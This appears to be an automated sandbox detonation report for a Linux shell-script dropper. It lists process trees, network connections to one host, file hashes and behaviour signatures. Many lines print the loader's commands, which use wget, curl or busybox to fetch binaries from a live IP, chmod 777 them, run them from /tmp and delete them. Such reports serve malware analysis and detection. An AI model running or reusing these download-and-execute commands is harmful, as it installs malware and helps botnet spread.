/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 01:01

Reported

2024-10-29 01:04

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

24s

Max time network

132s

Command Line

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A

Processes

/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

